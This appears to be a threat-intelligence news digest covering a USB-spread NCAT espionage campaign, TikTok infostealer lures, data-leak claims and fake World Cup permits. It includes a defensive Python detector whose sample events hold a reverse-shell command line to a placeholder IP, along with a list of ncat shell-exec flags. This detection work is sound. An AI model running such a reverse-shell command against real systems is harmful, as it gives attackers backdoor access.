
Blackpanda
December 2, 2022
China-based hackers have been observed conducting cyber espionage against public and private entities in Southeast Asia, using USB devices as the initial infection vector. A successful compromise led to the deployment of a renamed NCAT binary and the execution of a reverse shell on the victim's system, giving the threat actor backdoor access. The malware then self-replicates by infecting any new removable drive plugged into a compromised system, so the malicious payloads spread to additional systems, from which data can potentially be collected.
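The chain above (a renamed NCAT binary, launched from removable media, spawning a shell) leaves a recognisable signature in endpoint telemetry. The following is an added example for defenders and is not code from Blackpanda or from the reported campaign: it scores Sysmon-style process-creation events for three signals, a mismatch between the PE's embedded `OriginalFileName` and its on-disk name, use of ncat's real `-e`/`--exec`/`-c`/`--sh-exec` options, and launch from a drive other than the assumed system drive. The event field names and the sample events are constructed for this example.

```python
"""Detection sketch for the USB-borne NCAT intrusion described above.

Added example, not code from Blackpanda or the reported campaign. It assumes
Sysmon Event ID 1 style fields (Image, OriginalFileName, CommandLine); the
sample events below are constructed, not real telemetry.
"""
import ntpath

# ncat options that attach a program or shell to the network connection.
NCAT_EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}
# Names ncat carries in its PE version info / on disk.
NCAT_ORIGINAL_NAMES = {"ncat.exe", "ncat"}
# Assumption: the OS lives on C:; any other drive letter may be removable media.
SYSTEM_DRIVE = "C:"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # renamed ncat launched from a non-system drive, spawning cmd.exe
        "Image": r"E:\Documents\svchost.exe",
        "OriginalFileName": "ncat.exe",
        "CommandLine": r"svchost.exe 203.0.113.10 4444 -e cmd.exe",
    },
    {   # ncat under its own name, plain listener: not renamed, no shell
        "Image": r"C:\Tools\nmap\ncat.exe",
        "OriginalFileName": "ncat.exe",
        "CommandLine": "ncat.exe -l 9000",
    },
    {   # genuine svchost, should not be flagged
        "Image": r"C:\Windows\System32\svchost.exe",
        "OriginalFileName": "svchost.exe",
        "CommandLine": "svchost.exe -k netsvcs",
    },
]


def is_ncat(event):
    """True when the PE's embedded original name identifies it as ncat."""
    return (event.get("OriginalFileName") or "").lower() in NCAT_ORIGINAL_NAMES


def is_renamed_ncat(event):
    """True when the binary is ncat but its on-disk file name says otherwise."""
    original = (event.get("OriginalFileName") or "").lower()
    on_disk = ntpath.basename(event.get("Image", "")).lower()
    return original in NCAT_ORIGINAL_NAMES and on_disk != original


def has_shell_exec(command_line):
    """True when an ncat exec/sh-exec option is followed by a program argument."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens):
        if tok.lower() in NCAT_EXEC_FLAGS and i + 1 < len(tokens):
            return True
    return False


def launched_off_system_drive(image):
    """Heuristic: image path sits on a drive other than the assumed OS drive."""
    drive = ntpath.splitdrive(image)[0]
    return bool(drive) and drive.upper() != SYSTEM_DRIVE


def classify(event):
    """Return the list of triggered signals for one event (empty if benign)."""
    reasons = []
    if is_renamed_ncat(event):
        reasons.append("renamed-ncat")
    if is_ncat(event) and has_shell_exec(event.get("CommandLine", "")):
        reasons.append("ncat-shell-exec")
    if is_ncat(event) and launched_off_system_drive(event.get("Image", "")):
        reasons.append("non-system-drive")
    return reasons


def detect(events):
    """Return (index, reasons) for every event that triggers at least one signal."""
    hits = []
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for index, reasons in detect(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(reasons)} -> {SAMPLE_EVENTS[index]['Image']}")
```

`OriginalFileName` comes from the PE version resource, so a rebuilt or stripped binary will not carry it; in production the renamed-ncat check should fall back to a file-hash lookup against known ncat builds, and the drive-letter heuristic should be replaced by the removable-media flag from device-arrival telemetry where it is available.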
Threat actors are exploiting a well-known TikTok challenge to trick users into installing malware that steals their personal information. The trend, called the Invisible Challenge, involves applying a filter known as Invisible Body that leaves behind only a silhouette of the person's body. Because people filming such videos may be undressed, attackers have posted TikTok videos linking to rogue software dubbed "unfilter" that purports to remove the applied filter. Following the instructions to obtain the "unfilter" software instead deploys malware designed to steal users' passwords, Discord accounts, cryptocurrency wallets, and other sensitive information.
A threat actor has allegedly uploaded to the dark web a dataset containing the private data of approximately 500 million WhatsApp users. The threat actor claimed to be selling up-to-date personal information of 487 million WhatsApp users from 84 countries. The listing appeared just a few days after reports that Meta, the parent company of WhatsApp, had dismissed staff members for allegedly violating Facebook's terms of service by breaking into users' accounts. Meta has since denied the data leak.
A zero-day hack has affected at least 5 million Twitter users, and the total may exceed 20 million. Twitter acknowledged on August 5, 2022, that a threat actor had compiled a database of user data using a zero-day vulnerability, which Twitter says was patched in January 2022. However, according to cyber security researchers, the database, which contains the non-public information of more than 5 million people, is now freely available on a breached-data marketplace forum. It was also reported that the same vulnerability was used to build a second database, potentially containing 17 million records.
Cyber security experts cautioned on Monday that, with the FIFA World Cup currently taking place in Qatar, threat actors are selling bogus Hayya cards (essentially permit documents) to fans willing to pay any price to obtain one. A Hayya card must be presented alongside an original FIFA World Cup ticket to gain entry into the stadium. To purchase a fake Hayya card, threat actors ask for the victim's personal information, such as a valid passport ID, and payment in Bitcoin. Threat actors are also sharing hacking techniques that purportedly allow one to register for a Hayya card for free, without a valid FIFA ticket number.